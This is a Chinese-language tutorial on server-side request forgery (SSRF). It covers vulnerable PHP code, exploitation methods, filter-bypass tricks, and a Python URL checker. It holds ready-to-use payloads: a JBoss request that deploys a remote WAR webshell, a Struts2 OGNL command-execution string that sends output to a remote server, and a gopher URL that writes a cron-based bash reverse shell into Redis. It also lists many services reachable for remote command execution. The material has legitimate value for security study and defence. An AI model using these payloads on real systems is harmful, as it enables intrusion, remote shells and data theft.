https://github.com/cujanovic/SSRF-Testing
0x01 漏洞描述
很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。
如果对用户提交的URL没有做好判断,攻击者就可以通过该机器代理攻击内网服务器。
容易导致SSRF漏洞的Web功能有分享功能、手机转码、图片相关等等,总之在请求的参数中存在URL的时候都需要敏感一些。
0x02 代码示例
1)file_get_contents
<?php
$fh= file_get_contents($_GET['url']);
echo $fh;
?>
2)curl_exec
<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_GET["url"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
$output = curl_exec($ch);
echo $output;
curl_close($ch);
?>
3)fsockopen()
<?php
function GetFile($host,$port,$link)
{
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if (!$fp) {
echo "$errstr (error number $errno) \n";
}
else {
$out = "GET $link HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
$out .= "\r\n";
fwrite($fp, $out);
$contents='';
while (!feof($fp)) {
$contents.= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
?>
0x03 漏洞利用
1、通过file协议读取本地文件
image
2、端口扫描
首选需要收集内网IP地址,常用方式有:
a)漏洞平台历史漏洞获取
b)子域名解析结果中
c)扫描器扫描(例如WVS扫描会报出内网IP)
另外可以分为两种有回显和无回显两种情况
例如Web服务,有回显的话,就有可能访问到一些敏感系统,另外还可以识别内网应用的CMS等等,针对性的攻击
而如果没有回显的话,则可以通过返回内容、返回数据包的长度、页面响应时间等等确认端口开放情况。
3、攻击内网Web应用
这个wooyun上有人分享过了,仅仅通过GET方法就能攻击的两个案例:
jboss部署Webshell
/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system%3Aservice%3DMainDeployer&methodIndex=3&arg0=http%3A%2F%2F192.168.1.2%2Fzecmd.war
通过JBOSS HtmlAdaptor接口直接部署远程war包, 我们可以通过access.log去验证war包是否成功部署。
structs2 命令执行
?redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'command'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#t=#d.readLine(),#u="http://SERVER/result=".concat(#t),#http=new java.net.URL(#u).openConnection(),#http.setRequestMethod("GET"),#http.connect(),#http.getInputStream()}
命令执行结果会发送到远端服务器,通过access.log获取。
0x04 绕过姿势
1)利用解析URL所出现的问题
http://www.baidu.com@10.10.10.10与http://10.10.10.10 当后端程序通过不正确的正则表达式(比如将http之后到com为止的字符内容,也就是www.baidu.com,认为是访问请求的host地址时)对上述URL的内容进行解析的时候,很有可能会认为访问URL的host为www.baidu.com,而实际上这个URL所请求的内容都是10.10.10.10上的内容。
该绕过同样在URL跳转绕过中适用。
http://www.wooyun.org/bugs/wooyun-2015-091690
2)更改IP地址写法
ip地址转换成进制来访问
115.239.210.26 = 16373751032
3)添加端口可能绕过匹配正则
10.10.10.10:80 案例:
http://www.wooyun.org/bugs/wooyun-2014-061850
4)用短地址(302跳转)绕过,
如果后端服务器在接收到参数后,正确的解析了URL的host,并且进行了过滤,我们这个时候可以使用302跳转的方式来进行绕过。
案例:
http://www.wooyun.org/bugs/wooyun-2010-0132243
http://www.wooyun.org/bugs/wooyun-2010-0135257
5)利用xip.io和xip.name
10.0.0.1.xip.io 10.0.0.1
www.10.0.0.1.xip.io 10.0.0.1
mysite.10.0.0.1.xip.io 10.0.0.1
foo.bar.10.0.0.1.xip.io 10.0.0.1
10.0.0.1.xip.name resolves to 10.0.0.1
www.10.0.0.2.xip.name resolves to 10.0.0.2
foo.10.0.0.3.xip.name resolves to 10.0.0.3
bar.baz.10.0.0.4.xip.name resolves to 10.0.0.4
6)通过各种非HTTP协议[]
如果服务器端程序对访问URL所采用的协议进行验证的话,可以通过非HTTP协议来进行利用。
比如通过gopher,可以在一个url参数中构造POST或者GET请求,从而达到攻击内网应用的目的。例如可以使用gopher协议对与内网的Redis服务进行攻击,可以使用如下的URL:
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a
除了gopher协议,File协议也是SSRF中常用的协议,该协议主要用于访问本地计算机中的文件,我们可以通过类似 file:///path/to/file 这种格式来访问计算机本地文件。使用file协议可以避免服务端程序对于所访问的IP进行的过滤。例如我们可以通过 file:///d:/1.txt 来访问D盘中1.txt的内容
7) DNS Rebinding
一个常用的防护思路是:对于用户请求的URL参数,首先服务器端会对其进行DNS解析,然后对于DNS服务器返回的IP地址进行判断,如果在黑名单中,就pass掉。
但是在整个过程中,第一次去请求DNS服务进行域名解析到第二次服务端去请求URL之间存在一个时间查,利用这个时间差,可以进行DNS重绑定攻击。
要完成DNS重绑定攻击,我们需要一个域名,并且将这个域名的解析指定到我们自己的DNS Server,在我们的可控的DNS Server上编写解析服务,设置TTL时间为0。这样就可以进行攻击了,完整的攻击流程为:
- 服务器端获得URL参数,进行第一次DNS解析,获得了一个非内网的IP
- 对于获得的IP进行判断,发现为非黑名单IP,则通过验证
- 服务器端对于URL进行访问,由于DNS服务器设置的TTL为0,所以再次进行DNS解析,这一次DNS服务器返回的是内网地址。
- 由于已经绕过验证,所以服务器端返回访问内网资源的结果。
0x05 可能的利用点
ftp、ftps (FTP爆破)
sftp
tftp(UDP协议扩展)
dict
gopher
ldap
imap/imaps/pop3/pop3s/smtp/smtps(爆破邮件用户名密码)
rtsp - smb/smbs (连接SMB)
telnet
http、https - 内网服务探测
ShellShock命令执行
JBOSS远程Invoker war命令执行
Java调试接口命令执行
axis2-admin部署Server命令执行
Jenkins Scripts接口命令执行
Confluence SSRF
Struts2 命令执行
counchdb WEB API远程命令执行
mongodb SSRF
docker API远程命令执行
php_fpm/fastcgi 命令执行
tomcat命令执行
Elasticsearch引擎Groovy脚本命令执行
WebDav PUT上传任意文件
WebSphere Admin可部署war间接命令执行
Apache Hadoop远程命令执行
zentoPMS远程命令执行
HFS远程命令执行
glassfish任意文件读取和war文件部署间接命令执行
0x06 参数检测
# -*- coding: utf8 -*-
"""
Server-side Request Forgery vulnerability
"""
import sys
import urlparse
import re
import socket
import struct
import requests
def ip_into_int(ip):
return reduce(lambda x,y:(x<<8)+y,map(int,ip.split('.')))
def is_internal_ip(ip):
ip = ip_into_int(ip)
net_a = ip_into_int('10.255.255.255') >> 24
net_b = ip_into_int('172.31.255.255') >> 20
net_c = ip_into_int('192.168.255.255') >> 16
return ip >> 24 == net_a or ip >>20 == net_b or ip >> 16 == net_c
def ssrfcheck(url):
'''
SSRF绕过方式:
a) 302 redirect
b) mysite.10.0.0.1.xip.io:80
c) 123@baidu.com
d) 16373751032
'''
if '://' in url:
if not url.startswith('http') and not url.startswith('https'):
print "Unsupported scheme"
sys.exit()
else:
url = 'http://' + url
domain = urlparse.urlsplit(url).netloc
path = urlparse.urlsplit(url).path
scheme = urlparse.urlsplit(url).scheme
port = ''
if '@' in domain: # 123@baidu.com
domain = domain[domain.index('@') + 1:]
if re.findall(':\d{1,5}$', domain): # mysite.10.0.0.1.xip.io:80
_list = domain.split(':')
domain = _list[0]
port = _list[1]
if re.findall('^\d*$', domain): # 16373751032
domain = socket.inet_ntoa(struct.pack('I',socket.htonl(int(domain))))
compile_ip=re.compile('^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$')
if compile_ip.match(domain):
ipaddr = domain
else:
ipaddr = socket.gethostbyname(domain)
if not is_internal_ip(ipaddr):
if port:
url = scheme + "://" + domain + ":" + port + path
else:
url = scheme + "://" + domain + path
print url
try: # 302 redirect
r = requests.head(url, stream=True, timeout=1)
if r.status_code == 302:
print "302 Redirect"
_url = r.headers['Location']
ssrfcheck(_url)
else:
print "External IP"
except Exception, e:
print e
return False
else:
print "Intranet IP"
if __name__ == '__main__':
ssrfcheck(sys.argv[1])
0x07 参考文章
http://www.tuicool.com/articles/32UnAzq
http://0cx.cc/some_tips_with_sssrf.jspx
http://wufeifei.com/ssrf/
SSRF漏洞分析与利用
A New Era Of SSRF
php ssrf technique
谈一谈如何在Python开发中拒绝SSRF漏洞
SSRF Tips
网友评论